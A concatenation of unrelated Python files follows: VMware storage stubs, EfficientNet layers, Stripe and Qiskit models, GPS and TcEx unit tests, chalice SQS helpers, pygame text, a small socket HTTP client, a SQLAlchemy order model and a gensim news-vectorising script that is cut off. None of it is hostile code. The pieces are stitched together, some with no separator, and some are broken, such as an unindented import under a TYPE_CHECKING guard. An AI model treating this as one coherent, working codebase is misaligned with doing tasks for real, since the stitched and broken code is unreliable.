               targetDeviceId = sms.storage.replication.ReplicaId()
               recoveredDeviceId = sms.storage.replication.DeviceId()
               sourceDeviceId = sms.storage.replication.DeviceId()
               info = [ "" ]
               datastore = vim.Datastore()
               recoveredDiskInfo = [ sms.storage.replication.FailoverSuccessResult.RecoveredDiskInfo() ]
               error = vmodl.MethodFault()
               warnings = [ vmodl.MethodFault() ]
         class GroupErrorResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.GroupErrorResult
            error = [ vmodl.MethodFault() ]
         class RecoveredTargetGroupMemberInfo(sms.storage.replication.TargetGroupMemberInfo): # sms.storage.replication.RecoveredTargetGroupMemberInfo
            recoveredDeviceId = sms.storage.replication.DeviceId()
         class VirtualMachineFilePath(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineFilePath
            vcUuid = ""
            dsUrl = ""
            vmxPath = ""
      class FcStoragePort(sms.storage.StoragePort): # sms.storage.FcStoragePort
         portWwn = ""
         nodeWwn = ""
      class FcoeStoragePort(sms.storage.StoragePort): # sms.storage.FcoeStoragePort
         portWwn = ""
         nodeWwn = ""
      class IscsiStoragePort(sms.storage.StoragePort): # sms.storage.IscsiStoragePort
         identifier = ""
|
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Input, Dense, Conv2D, DepthwiseConv2D, BatchNormalization, Dropout, GlobalAveragePooling2D, Reshape, multiply, add, Activation
from skimage.transform import resize
# Serialized Keras initializer config for convolution kernels:
# VarianceScaling with scale=2.0, fan_out mode, truncated-normal distribution.
CONV_KERNEL_INITIALIZER = {
    'class_name': 'VarianceScaling',
    'config': {
        'scale': 2.0,
        'mode': 'fan_out',
        'distribution': 'normal'
    }
}
# Serialized Keras initializer config for dense (fully-connected) kernels:
# uniform VarianceScaling with scale 1/3, fan_out mode.
DENSE_KERNEL_INITIALIZER = {
    'class_name': 'VarianceScaling',
    'config': {
        'scale': 1. / 3.,
        'mode': 'fan_out',
        'distribution': 'uniform'
    }
}
def SqueezeExcitation(x, filters_in, filters_expand, se_ratio):
    """Apply a squeeze-and-excitation block to the feature map ``x``.

    The map is globally average-pooled ("squeeze"), passed through a
    two-conv bottleneck that produces sigmoid channel weights
    ("excitation"), and those weights are multiplied back onto ``x``.

    Args:
        x: feature map with ``filters_expand`` channels.
        filters_in: pre-expansion channel count; the bottleneck width is
            derived from it.
        filters_expand: channel count of ``x``.
        se_ratio: fraction of ``filters_in`` used as the bottleneck width.

    Returns:
        Tensor with the same shape as ``x``, rescaled channel-wise.
    """
    # Bottleneck width, clamped so it never drops below one channel.
    filters_se = max(1, int(filters_in * se_ratio))

    # Squeeze: collapse spatial dims to a per-channel context vector,
    # then restore a 1x1 spatial shape for the convs below.
    weights = GlobalAveragePooling2D()(x)
    weights = Reshape((1, 1, filters_expand))(weights)

    # Excitation: reduce to the bottleneck width with swish...
    weights = Conv2D(filters=filters_se,
                     kernel_size=1,
                     padding='same',
                     kernel_initializer=CONV_KERNEL_INITIALIZER,
                     use_bias=True)(weights)
    weights = Activation(tf.nn.swish)(weights)
    # ...then project back to the full width with a sigmoid gate in [0, 1].
    weights = Conv2D(filters=filters_expand,
                     kernel_size=1,
                     padding='same',
                     activation='sigmoid',
                     kernel_initializer=CONV_KERNEL_INITIALIZER,
                     use_bias=True)(weights)

    # Scale: reweight the original map channel by channel.
    return multiply([x, weights])
def __bottleneck(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, dropout_rate):
    """One MBConv (mobile inverted bottleneck) unit.

    Pipeline: 1x1 expansion conv (skipped when ``expansion_coef == 1``) ->
    depthwise conv -> squeeze-and-excitation -> linear 1x1 projection.
    A residual connection (with optional dropout) is added only when the
    spatial size and channel count are preserved, i.e. ``stride == 1`` and
    ``filters_in == filters_out``.
    """
    # Channel count after the expansion conv.
    expanded = filters_in * expansion_coef

    # Expansion: widen the channel dimension with a pointwise conv.
    x = inputs
    if expansion_coef != 1:
        x = Conv2D(filters=expanded,
                   kernel_size=1,
                   strides=1,
                   padding='same',
                   kernel_initializer=CONV_KERNEL_INITIALIZER,
                   use_bias=False)(x)
        x = BatchNormalization()(x)
        x = Activation(tf.nn.swish)(x)

    # Depthwise conv: spatial filtering, one filter per channel.
    x = DepthwiseConv2D(kernel_size=kernel_size,
                       strides=stride,
                       padding='same',
                       depthwise_initializer=CONV_KERNEL_INITIALIZER,
                       use_bias=False)(x)
    x = BatchNormalization()(x)
    x = Activation(tf.nn.swish)(x)

    # Squeeze-and-excitation: channel-wise reweighting.
    x = SqueezeExcitation(x, filters_in, expanded, se_ratio)

    # Projection: linear (no activation) pointwise conv to filters_out.
    x = Conv2D(filters=filters_out,
               kernel_size=1,
               padding='same',
               kernel_initializer=CONV_KERNEL_INITIALIZER,
               use_bias=False)(x)
    x = BatchNormalization()(x)

    # Identity skip connection when input and output shapes match.
    if stride == 1 and filters_in == filters_out:
        if dropout_rate > 0:
            x = Dropout(dropout_rate)(x)
        x = add([x, inputs])
    return x
def MBConvBlock(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, repeat, dropout_rate):
    """Stack `repeat` MBConv bottlenecks.

    Only the first repeat may change the stride and the channel count; all
    subsequent repeats run with stride 1 and filters_out -> filters_out.
    """
    x = __bottleneck(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, dropout_rate)
    for _ in range(repeat - 1):
        x = __bottleneck(x, filters_out, filters_out, kernel_size, expansion_coef, se_ratio, 1, dropout_rate)
    return x
def ConvBlock(inputs, filters, kernel_size, stride=1, padding='same'):
    """Conv2D -> BatchNorm -> swish.

    The convolution carries no bias: BatchNormalization supplies the shift.
    """
    y = Conv2D(filters=filters,
               kernel_size=kernel_size,
               strides=stride,
               padding=padding,
               use_bias=False,
               kernel_initializer=CONV_KERNEL_INITIALIZER)(inputs)
    y = BatchNormalization()(y)
    return Activation(tf.nn.swish)(y)
def efficientnet_params(model_name):
    """Return the scaling parameters for a named EfficientNet variant.

    Returns:
        Tuple (width_coefficient, depth_coefficient, resolution, dropout_rate).

    Raises:
        KeyError: if `model_name` is not a known variant.
    """
    return {
        'efficientnet-b0': (1.0, 1.0, 224, 0.2),
        'efficientnet-b1': (1.0, 1.1, 240, 0.2),
        'efficientnet-b2': (1.1, 1.2, 260, 0.3),
        'efficientnet-b3': (1.2, 1.4, 300, 0.3),
        'efficientnet-b4': (1.4, 1.8, 380, 0.4),
        'efficientnet-b5': (1.6, 2.2, 456, 0.4),
        'efficientnet-b6': (1.8, 2.6, 528, 0.5),
        'efficientnet-b7': (2.0, 3.1, 600, 0.5),
        'efficientnet-b8': (2.2, 3.6, 672, 0.5),
        'efficientnet-l2': (4.3, 5.3, 800, 0.5),
    }[model_name]
def scaled_repeats(n, d_coef):
    """Scale a block-repeat count `n` by the depth coefficient, rounding up."""
    scaled = n * d_coef
    return int(math.ceil(scaled))
def scaled_channels(n, w_coef):
    """Scale a channel count by `w_coef`, rounding to a multiple of 8.

    Mirrors the reference EfficientNet `round_filters`: never returns less
    than 8, and bumps up one step if rounding would lose more than 10%.
    """
    scaled = n * w_coef
    divisor = 8
    rounded = max(divisor, int(scaled + divisor / 2) // divisor * divisor)
    if rounded < 0.9 * scaled:
        rounded += divisor
    return int(rounded)
def center_crop_and_resize(image, image_size, crop_padding=32, interpolation="bicubic"):
    """Center-crop a 2D or 3D (H, W[, C]) image and resize to a square.

    The crop edge is min(h, w) * image_size / (image_size + crop_padding),
    matching the EfficientNet evaluation preprocessing, and the crop is then
    resized to (image_size, image_size) with the requested interpolation.
    """
    interpolation_orders = {
        "nearest": 0,
        "bilinear": 1,
        "biquadratic": 2,
        "bicubic": 3,
    }
    assert image.ndim in {2, 3}
    assert interpolation in interpolation_orders.keys()
    h, w = image.shape[:2]
    crop_size = int(
        (image_size / (image_size + crop_padding)) * min(h, w)
    )
    top = ((h - crop_size) + 1) // 2
    left = ((w - crop_size) + 1) // 2
    # Crop only the leading spatial axes; channels (if any) pass through.
    cropped = image[
        top: crop_size + top,
        left: crop_size + left,
    ]
    return resize(
        cropped,
        (image_size, image_size),
        order=interpolation_orders[interpolation],
        preserve_range=True,
    )
from typing import Union
from urllib.parse import parse_qs
from hw.alexander_sidorov.common import Errors
from hw.alexander_sidorov.common import api
from hw.alexander_sidorov.common import typecheck
Data = dict[str, list[str]]
@api
@typecheck
def task_06(query: str) -> Union[Data, Errors]:
    """
    Splits HTTP query into a dict.
    """
    # keep_blank_values=True so "a=&b=1" maps "a" to [""] instead of
    # dropping the key.
    return parse_qs(query, keep_blank_values=True)
|
from __future__ import absolute_import, division, print_function
from stripe_modern.api_resources.abstract import CreateableAPIResource
from stripe_modern.api_resources.abstract import ListableAPIResource
from stripe_modern.api_resources.abstract import nested_resource_class_methods
@nested_resource_class_methods("line_item", operations=["list"])
class Session(CreateableAPIResource, ListableAPIResource):
    # Stripe Checkout Session resource. The decorator adds class methods for
    # listing the nested "line_item" resource of a session.
    OBJECT_NAME = "checkout.session"
|
"""Declare the Requests client interface and register it."""
import typing
import zope.interface
import zope.interface.verify
if typing.TYPE_CHECKING:
import requests
from . import interface
@zope.interface.implementer(interface.IRequest)
class Requests:
    """ClientAdapter used with the Requests library."""

    def uri(
        self: "Requests",
        request: typing.Any,
    ) -> str:
        """Retrieve the URL of a PreparedRequest from Requests."""
        # The casts are type-checker-only; at runtime this simply reads .url.
        prepared = typing.cast("requests.PreparedRequest", request)
        return typing.cast("str", prepared.url)
|
"""Tests the gps module."""
import unittest
from mock import patch
import pynmea2
import pytest
import control.gps
# mock gps nmea 0183 messages
# GGA fix (position + altitude), 7 satellites locked
NMEA_MSG_GGA = "$GNGGA,183236.00,3311.64266,N,08730.77826,W,1,07,1.24,85.4,M,-29.8,M,,*4A"
# second GGA fix, slightly different position/time
NMEA_MSG_GGA2 = "$GNGGA,183235.00,3311.64268,N,08730.77830,W,1,07,1.24,85.5,M,-29.8,M,,*41"
# RMC (recommended minimum) sentence — not a GGA
NMEA_MSG_RMC = "$GNRMC,183235.00,A,3311.64268,N,08730.77830,W,0.169,,040318,,,A*7B"
# GSV (satellites in view) sentence — not a GGA
NMEA_MSG_GSV = "$GPGSV,2,2,06,26,61,047,42,31,27,063,38*70"
# GGA with empty fields: no satellite lock
NMEA_MSG_NOLOCK = "$GNGGA,,,,,,0,00,99.99,,,,,,*56"
# unparseable garbage
NMEA_MSG_CORRUPT = "..,,,,99,,,,"
def expected_gps_reading(msg):
    """Helper function returns expected parsed nmea message as a GpsReading"""
    parsed = pynmea2.parse(msg)
    return control.gps.GpsReading(
        parsed.latitude, parsed.longitude, parsed.altitude, parsed.timestamp)
class GPStest(unittest.TestCase):
    """GPS module unit tests."""
    def setUp(self):
        # Patch serial.Serial so Gps never opens real hardware; each test
        # scripts the mock connection's readline() with canned NMEA strings.
        self.patcher = patch('serial.Serial')
        self.addCleanup(self.patcher.stop)
        self.mock_serial_class = self.patcher.start()
        self.mock_serial_connect = self.mock_serial_class.return_value
        self.gps = control.gps.Gps("connection", 9600)
    def test_gps_gga_msg_read(self):
        """Test reading a proper GGA message."""
        self.mock_serial_connect.readline.return_value = NMEA_MSG_GGA
        expected_reading = expected_gps_reading(NMEA_MSG_GGA)
        actual_reading = self.gps.read()
        self.assertEqual(actual_reading, expected_reading)
    def test_gps_multiple_msg_types(self):
        """Test reading multiple nmea message types."""
        # read() is expected to skip RMC/GSV sentences until a GGA arrives.
        msg_return_list = [NMEA_MSG_RMC, NMEA_MSG_GSV, NMEA_MSG_GGA2]
        self.mock_serial_connect.readline.side_effect = msg_return_list
        expected_reading = expected_gps_reading(NMEA_MSG_GGA2)
        actual_reading = self.gps.read()
        self.assertEqual(actual_reading, expected_reading)
    def test_gps_satellite_no_lock_msg(self):
        """Test reading a nmea message with no satellite lock."""
        # A no-lock GGA is still a GGA, so it is returned as the reading.
        msg_return_list = [NMEA_MSG_RMC, NMEA_MSG_NOLOCK, NMEA_MSG_GGA]
        self.mock_serial_connect.readline.side_effect = msg_return_list
        expected_reading = expected_gps_reading(NMEA_MSG_NOLOCK)
        actual_reading = self.gps.read()
        self.assertEqual(actual_reading, expected_reading)
    def test_gps_corrupt_msg(self):
        """Test reading a corrupt nmea message."""
        # Three consecutive parse failures are tolerated before giving up
        # (see test_gps_corrupt_msg3, where four in a row raise).
        msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_GGA]
        self.mock_serial_connect.readline.side_effect = msg_return_list
        expected_reading = expected_gps_reading(NMEA_MSG_GGA)
        actual_reading = self.gps.read()
        self.assertEqual(actual_reading, expected_reading)
    def test_gps_corrupt_msg2(self):
        """Test reading a corrupt nmea message mixed with other valid messages."""
        msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_GSV,
                           NMEA_MSG_RMC, NMEA_MSG_GGA, NMEA_MSG_CORRUPT]
        self.mock_serial_connect.readline.side_effect = msg_return_list
        expected_reading = expected_gps_reading(NMEA_MSG_GGA)
        actual_reading = self.gps.read()
        self.assertEqual(actual_reading, expected_reading)
    def test_gps_corrupt_msg3(self):
        """Test reading max number of corrupt nmea messages."""
        # Four corrupt reads in a row exhaust the retry budget and raise.
        with pytest.raises(control.gps.GpsReadError):
            msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT,
                               NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_GGA]
            self.mock_serial_connect.readline.side_effect = msg_return_list
            self.gps.read()
def test_offset_and_locations_are_inverse_functions():
    """Tests that get_location_offset and get_relative_from_location are
    inverse functions.

    Round-tripping an (east, north) offset through the two conversions should
    recover the offset to within GPS rounding error (< 1 unit).
    """
    origin = control.gps.GpsReading(33.142220, -87.582491, 0, 0)
    offset = control.gps.get_location_offset(origin, 10, 15)
    tup = control.gps.get_relative_from_location(origin, offset)
    # BUG FIX: the original one-sided comparisons (e.g. `tup[0] - 15 < 1`)
    # pass for ANY arbitrarily large negative error; abs() bounds both sides.
    assert abs(tup[0] - 15) < 1
    assert abs(tup[1] - 10) < 1
    offset = control.gps.get_location_offset(origin, -7, -15)
    tup = control.gps.get_relative_from_location(origin, offset)
    assert abs(tup[0] + 15) < 1
    assert abs(tup[1] + 7) < 1
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Models for PassManagerConfig and its related components."""
from qiskit.transpiler.models import PassManagerConfigSchema
from qiskit.validation import BaseModel, bind_schema
@bind_schema(PassManagerConfigSchema)
class PassManagerConfig(BaseModel):
    """Model for PassManagerConfig.

    Please note that this class only describes the required fields. For the
    full description of the model, please check ``PassManagerConfigSchema``.

    Attributes:
        initial_layout (Layout): Initial position of virtual qubits on physical qubits.
        basis_gates (list): List of basis gate names to unroll to.
        coupling_map (CouplingMap): Directed graph represented a coupling map.
        backend_properties (BackendProperties): Properties returned by a backend, including
            information on gate errors, readout errors, qubit coherence times, etc.
        seed_transpiler (int): Sets random seed for the stochastic parts of the transpiler.
    """
    def __init__(self,
                 initial_layout=None,
                 basis_gates=None,
                 coupling_map=None,
                 backend_properties=None,
                 seed_transpiler=None,
                 **kwargs):
        # All fields are optional; validation against the bound schema is
        # handled by BaseModel via the bind_schema decorator.
        super().__init__(initial_layout=initial_layout,
                         basis_gates=basis_gates,
                         coupling_map=coupling_map,
                         backend_properties=backend_properties,
                         seed_transpiler=seed_transpiler,
                         **kwargs)
|
import ConfigParser
class ConfigurationOptions(object):
    """
    Generic shell object for storing attributes: ConfigurationParser sets
    one attribute per registered option on an instance of this class.
    """
    pass
class ConfigurationParser(object):
    """Declarative config reader built on ConfigParser.

    Register options with add_option(), then call parse_config() to get a
    ConfigurationOptions object with one attribute per registered option.
    """
    def __init__(self, path=""):
        # dest -> option spec dict (see add_option)
        self._options = {}
        self._path = path
    def set_path(self, path):
        """Set the config-file path that parse_config() will read."""
        self._path = path
    def add_option(self, dest, path, help=None, action="get", default=None, type="string"):
        """Register an option.

        Args:
            dest: attribute name set on the parse_config() result object.
            path: argument tuple for the ConfigParser accessor, typically
                (section, option).
            help: human-readable description (stored but unused here).
            action: ConfigParser accessor name to call ("get", "getint",
                "getboolean", ...).
            default: fallback value when the option is missing or conversion
                fails.
            type: callable applied to the raw value.
                NOTE(review): the default "string" is NOT callable, so options
                registered without an explicit type always fall back to
                `default`; pass `str` to actually read string values.
        """
        self._options[dest] = {
            'path': path,
            'help': help,
            'action': action,
            'default': default,
            'type': type,
        }
    def del_option(self, dest):
        """Unregister `dest`; unknown names are ignored."""
        if dest in self._options:
            del self._options[dest]
    def parse_config(self):
        """Read the config file and resolve every registered option.

        Returns:
            ConfigurationOptions with one attribute per registered option.
        """
        options = ConfigurationOptions()
        config = ConfigParser.ConfigParser(allow_no_value=True)
        config.read(self._path)
        for dest, details in self._options.items():
            path = details['path']
            actionfxn = getattr(config, details['action'])
            try:
                value = details['type'](actionfxn(*path))
            except Exception:
                # Best-effort by design: any lookup/conversion failure yields
                # the default. BUG FIX: this was a bare `except:`, which also
                # swallowed SystemExit and KeyboardInterrupt.
                value = details['default']
            setattr(options, dest, value)
        return options
|
"""Test the TcEx Batch Module."""
# third-party
import pytest
# pylint: disable=no-self-use
class TestUtils:
    """Test TCEntity / TCEntityArray round-trips through the Key Value Store."""

    @pytest.mark.parametrize(
        'variable,value',
        [
            ('#App:0002:te1!TCEntity', {'id': '001', 'value': '1.1.1.1', 'type': 'Address'}),
            ('#App:0002:te2!TCEntity', {'id': '002', 'value': '2.2.2.2', 'type': 'Address'}),
            ('#App:0002:te3!TCEntity', {'id': '003', 'value': '3.3.3.3', 'type': 'Address'}),
            ('#App:0002:te4!TCEntity', {'id': '004', 'value': '3.3.3.3', 'type': 'Address'}),
        ],
    )
    def test_playbook_tc_entity(self, variable, value, tcex):
        """Round-trip a single TCEntity through the Key Value Store.

        Args:
            variable (str): The key/variable to create in Key Value Store.
            value (dict): The TCEntity to store in Key Value Store.
            tcex (TcEx, fixture): An instantiated instance of TcEx object.
        """
        tcex.playbook.create_tc_entity(variable, value)
        result = tcex.playbook.read_tc_entity(variable)
        assert result == value, f'result of ({result}) does not match ({value})'
        # delete must remove the variable entirely
        tcex.playbook.delete(variable)
        assert tcex.playbook.read(variable) is None

    @pytest.mark.parametrize(
        'variable,value',
        [
            ('#App:0002:b1!TCEntity', {'one': '1', 'two': 'two'}),
            ('#App:0002:b2!TCEntity', []),
            ('#App:0002:b3!TCEntity', {}),
            ('#App:0002:b4!WrongType', 'wrong type'),
        ],
    )
    def test_playbook_tc_entity_fail(self, variable, value, tcex):
        """Verify create_tc_entity rejects malformed TCEntity values.

        Args:
            variable (str): The key/variable to create in Key Value Store.
            value: An invalid TCEntity payload (wrong keys or wrong type).
            tcex (TcEx, fixture): An instantiated instance of TcEx object.
        """
        # pytest.raises replaces the try / assert False / except pattern and
        # produces a precise failure message when nothing is raised.
        with pytest.raises(RuntimeError):
            tcex.playbook.create_tc_entity(variable, value)

    @pytest.mark.parametrize(
        'variable,value',
        [
            (
                '#App:0002:tea1!TCEntityArray',
                [
                    {'id': '001', 'value': '1.1.1.1', 'type': 'Address'},
                    {'id': '011', 'value': '11.11.11.11', 'type': 'Address'},
                ],
            ),
            (
                '#App:0002:tea2!TCEntityArray',
                [
                    {'id': '002', 'value': '2.2.2.2', 'type': 'Address'},
                    {'id': '022', 'value': '22.22.22.22', 'type': 'Address'},
                ],
            ),
            (
                '#App:0002:tea3!TCEntityArray',
                [
                    {'id': '003', 'value': '3.3.3.3', 'type': 'Address'},
                    {'id': '033', 'value': '33.33.33.33', 'type': 'Address'},
                ],
            ),
            (
                '#App:0002:tea4!TCEntityArray',
                [
                    {'id': '004', 'value': '4.4.4.4', 'type': 'Address'},
                    {'id': '044', 'value': '44.44.44.44', 'type': 'Address'},
                ],
            ),
        ],
    )
    def test_playbook_tc_entity_array(self, variable, value, tcex):
        """Round-trip a TCEntityArray through the Key Value Store.

        Args:
            variable (str): The key/variable to create in Key Value Store.
            value (list): The TCEntityArray to store in Key Value Store.
            tcex (TcEx, fixture): An instantiated instance of TcEx object.
        """
        tcex.playbook.create_tc_entity_array(variable, value)
        result = tcex.playbook.read_tc_entity_array(variable)
        assert result == value, f'result of ({result}) does not match ({value})'
        tcex.playbook.delete(variable)
        assert tcex.playbook.read(variable) is None

    @pytest.mark.parametrize(
        'variable,value',
        [
            (
                '#App:0003:tea1!TCEntityArray',
                [
                    {'id': '001', 'value': '1.1.1.1', 'type': 'Address'},
                    {'id': '011', 'ip': '11.11.11.11', 'type': 'Address'},
                ],
            ),
            ('#App:0003:tea2!TCEntityArray', 'not a TCEntityArray'),
            ('#App:0003:tea3!WrongType', 'wrong type'),
        ],
    )
    def test_playbook_tc_entity_array_fail(self, variable, value, tcex):
        """Verify create_tc_entity_array rejects malformed arrays.

        Args:
            variable (str): The key/variable to create in Key Value Store.
            value: An invalid TCEntityArray payload.
            tcex (TcEx, fixture): An instantiated instance of TcEx object.
        """
        with pytest.raises(RuntimeError):
            tcex.playbook.create_tc_entity_array(variable, value)
|
# # -*- coding: utf-8 -*-
# """
# models.planning
# ~~~~~~~~~~~~~~~
# Planning specific models. This might get re-named or simply re-ordered.
# TODO: Work out what these are
# """
# # 3rd Party
# import sqlalchemy as sa
# # Module
# from .core import BaseModel
# class MaxAnnualOperationalThroughput(BaseModel):
# volume_unit = sa.Column(Unicode(255))
# class InertLandfill(BaseModel):
# total_void_capacity =''
# max_annual_operational_throughput = sa.Column(
# sa.Integer, sa.ForeignKey('max_annual_operational_throughput.id'))
|
import json
from chalice.app import SQSEvent
from chalice.app import SQSRecord
from tests.unit.helpers.aws.sqs_helper import get_sqs_event_stub, get_sqs_message_stub
def create_chalice_sqs_record(event_dict, context=None):
    """Wrap `event_dict` in a chalice SQSRecord, stubbing missing envelope fields.

    NOTE(review): `event_dict[0]` raises KeyError for a plain dict without a
    0 key, so the first branch appears to expect a sequence-like input —
    confirm the intended input shapes with callers.
    """
    event = event_dict
    if event_dict[0]:
        event = event_dict[0]
    elif 'body' not in event_dict and 'messageId' not in event_dict:
        # Bare payload: wrap it in a full SQS message stub.
        event = get_sqs_event_stub()
        event['body'] = event_dict
    return SQSRecord(event, context)
def create_chalice_sqs_event(event_dict, context=None):
    """Wrap `event_dict` in a chalice SQSEvent.

    A dict that already carries a 'Records' envelope is used as-is; anything
    else is JSON-encoded into the body of a stubbed single-record event.
    """
    if 'Records' in event_dict:
        sqs_event = event_dict
    else:
        message = get_sqs_message_stub()
        message['body'] = json.dumps(event_dict)
        sqs_event = get_sqs_event_stub()
        sqs_event['Records'].append(message)
    return SQSEvent(sqs_event, context)
|
import pygame, easygui, sys
import constants
pygame.init()
# Load the large center font; if the bundled font file is missing, show a
# dialog and exit instead of crashing later with a pygame error.
try:
    centerFontObj = pygame.font.Font("resources/font.ttf", 32)
except pygame.error:
    easygui.msgbox("font.ttf doesn't exist.")
    pygame.quit()
    sys.exit()
# Smaller HUD font; unguarded because a missing file already exited above.
fontObj = pygame.font.Font("resources/font.ttf", 16)
class centerText:
    """A rendered text surface pre-positioned at the center of the screen."""
    def __init__(self, text):
        # Keep the raw string so __str__ can return it (a Surface is not str).
        self.raw_text = text
        self.text = centerFontObj.render(text, True, constants.WHITE)
        self.rect = self.text.get_rect()
        self.rect.center = (constants.SCREEN_WIDTH/2, constants.SCREEN_HEIGHT/2)
    def __str__(self):
        # BUG FIX: previously returned the rendered pygame Surface, which made
        # str(obj) raise TypeError — __str__ must return a str.
        return self.raw_text
class ScoreText:
    """HUD text in the top-left corner showing the score and elapsed time."""
    def __init__(self):
        # Start with an empty rendered surface anchored at (0, 0).
        self.text = fontObj.render("", True, constants.WHITE)
        self.rect = self.text.get_rect()
        self.rect.x = 0
        self.rect.y = 0
    def update(self, score1, score2, time):
        """Re-render the HUD line with the latest scores and elapsed time."""
        #self.text = fontObj.render("Tank 1 Score: " + str(score1) + " | Tank 2 Score: " + str(score2) + " | Time: " + str(time), True, constants.WHITE, constants.BLACK)
        self.text = fontObj.render("Score: " + str(score1) + "-" + str(score2) + "  Time: " + str(time), True, constants.WHITE, constants.BLACK)
def splashText(text):
    """Render `text` centered on the currently active display surface."""
    surface = pygame.display.get_surface()
    rendered = centerText(text)
    surface.blit(rendered.text, rendered.rect)
import socket

# Minimal raw-socket HTTP/1.0 client that fetches romeo.txt and prints it.
myso = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
myso.connect(('www.py4inf.com', 80))
# BUG FIX: Python 3 sockets send bytes, not str, and HTTP header lines are
# terminated by CRLF ("\r\n") per the HTTP specification, not bare "\n".
myso.send(b'GET http://www.py4inf.com/code/romeo.txt HTTP/1.0\r\n\r\n')
while True:
    data = myso.recv(512)
    if len(data) < 1:
        break
    # BUG FIX: `print data` is Python 2 syntax (SyntaxError in Python 3);
    # decode the received bytes for readable output.
    print(data.decode(errors='replace'))
myso.close()
|
# import the SQLAlchemy column helpers used to declare the table fields
from sqlalchemy import Column, Boolean, Integer, ForeignKey
# import the ORM helpers used to link tables together
from sqlalchemy.orm import relationship, backref
# import the declarative base class for SQLAlchemy models
from DB.dbcore import Base
# import the product model so the relationships below can reference it
from models.product import Products
from models.order_info import OrderInfo
class Order(Base):
    """
    Order model (SQLAlchemy declarative style); one row per product line
    placed in an order.
    """
    # Table field definitions
    __tablename__ = 'orders'
    id = Column(Integer, primary_key=True)
    is_current = Column(Boolean)
    order_id = Column(Integer, ForeignKey('order_info.id'))
    product_id = Column(Integer, ForeignKey('products.id'))
    quantity = Column(Integer)
    # cascade='delete,all' is used so related rows are deleted in cascade
    orders = relationship(
        OrderInfo,
        backref=backref('orders',
                        uselist=True,
                        cascade='delete,all'))
    products = relationship(
        Products,
        backref=backref('orders',
                        uselist=True,
                        cascade='delete,all'))
    def __init__(self, is_current, order_id, product_id, quantity):
        self.is_current = is_current
        self.order_id = order_id
        self.product_id = product_id
        self.quantity = quantity
    def __repr__(self):
        """
        Return the formal string representation of this object.
        """
        return "Order: {}".format(self.order_id)
# coding:utf8
"""
Description:实战案例5:Gensim实现新闻文本特征向量化
Author:伏草惟存
Prompt: code in Python3 env
"""
import os,time,sys
from mydict import *
from StopWords import *
from gensim import corpora, models
#******************** Efficient file reading ***********************************
class loadFolders(object):  # iterator over sub-folders
    """Iterable yielding the absolute path of each sub-folder of `par_path`."""
    def __init__(self, par_path):
        self.par_path = par_path
    def __iter__(self):
        for entry in os.listdir(self.par_path):
            entry_path = os.path.join(self.par_path, entry)
            # Only yield directories; plain files are skipped.
            if os.path.isdir(entry_path):
                yield entry_path
class loadFiles(object):
    """Iterate (category, content) pairs for every file under `par_path`.

    Expected layout: par_path/<category>/<file>; file bytes are decoded
    as UTF-8.
    """
    def __init__(self, par_path):
        self.par_path = par_path
    def __iter__(self):
        folders = loadFolders(self.par_path)
        for folder in folders:  # level directory: one folder per category
            catg = folder.split(os.sep)[-1]
            for file in os.listdir(folder):  # secondary directory
                file_path = os.path.join(folder, file)
                if os.path.isfile(file_path):
                    # BUG FIX: use a `with` block so the handle is closed even
                    # when the consumer abandons the generator; the original
                    # called close() only after the yield resumed, leaking the
                    # handle in that case. (rb: binary read is faster here.)
                    with open(file_path, 'rb') as this_file:
                        content = this_file.read().decode('utf8')
                    yield catg, content
if __name__=='__main__':
    start = time.time()
    n = 5  # sampling rate: keep 1 document out of every n
    path_doc_root = '../dataSet/CSCMNews'  # corpus root: one sub-folder per category
    path_tmp = '../dataSet/files/CSCMNews_model'  # where intermediate results are written
    path_dictionary = os.path.join(path_tmp, 'CSCMNews.dict')  # gensim dictionary file
    path_tmp_tfidf = os.path.join(path_tmp, 'tfidf_corpus')  # tf-idf corpus directory
    if not os.path.exists(path_tmp):
        os.makedirs(path_tmp)
    # ===================================================================
    # Stage 1: walk the documents, build the dictionary, drop rare tokens.
    # If no dictionary exists at the given path, generate one; otherwise skip.
    if not os.path.exists(path_dictionary):
        print('=== 未检测到有词典存在,开始遍历生成词典 ===')
        dictionary = corpora.Dictionary()
        files = loadFiles(path_doc_root)
        for i, msg in enumerate(files):
            if i % n == 0:
                catg = msg[0]
                content = msg[1]
                content = seg_doc(content)
                dictionary.add_documents([content])
                if int(i/n) % 1000 == 0:
                    print('{t} *** {i} \t docs has been dealed'
                          .format(i=i, t=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())))
        # drop tokens that occur in fewer than 5 documents
        small_freq_ids = [tokenid for tokenid, docfreq in dictionary.dfs.items() if docfreq < 5 ]
        dictionary.filter_tokens(small_freq_ids)
        dictionary.compactify()  # re-number token ids so they are contiguous again
        dictionary.save(path_dictionary)
        print('=== 词典已经生成 ===')
    else:
        print('=== 检测到词典已经存在,跳过该阶段 ===')
    # ===================================================================
    # Stage 2: transform every sampled document into a tf-idf vector.
    # NOTE(review): this unconditionally discards any dictionary built in
    # stage 1, so the branch below always reloads it from disk.
    dictionary = None
    if not os.path.exists(path_tmp_tfidf):
        print('=== 未检测到有tfidf文件夹存在,开始生成tfidf向量 ===')
        # If no tf-idf corpus exists at the given path, generate it; otherwise skip.
        if not dictionary:  # stage 1 may have been skipped: reload the dictionary
            dictionary = corpora.Dictionary.load(path_dictionary)
        os.makedirs(path_tmp_tfidf)
        files = loadFiles(path_doc_root)
        tfidf_model = models.TfidfModel(dictionary=dictionary)
        corpus_tfidf = {}
        for i, msg in enumerate(files):
            if i % n == 0:
                catg = msg[0]
                content = msg[1]
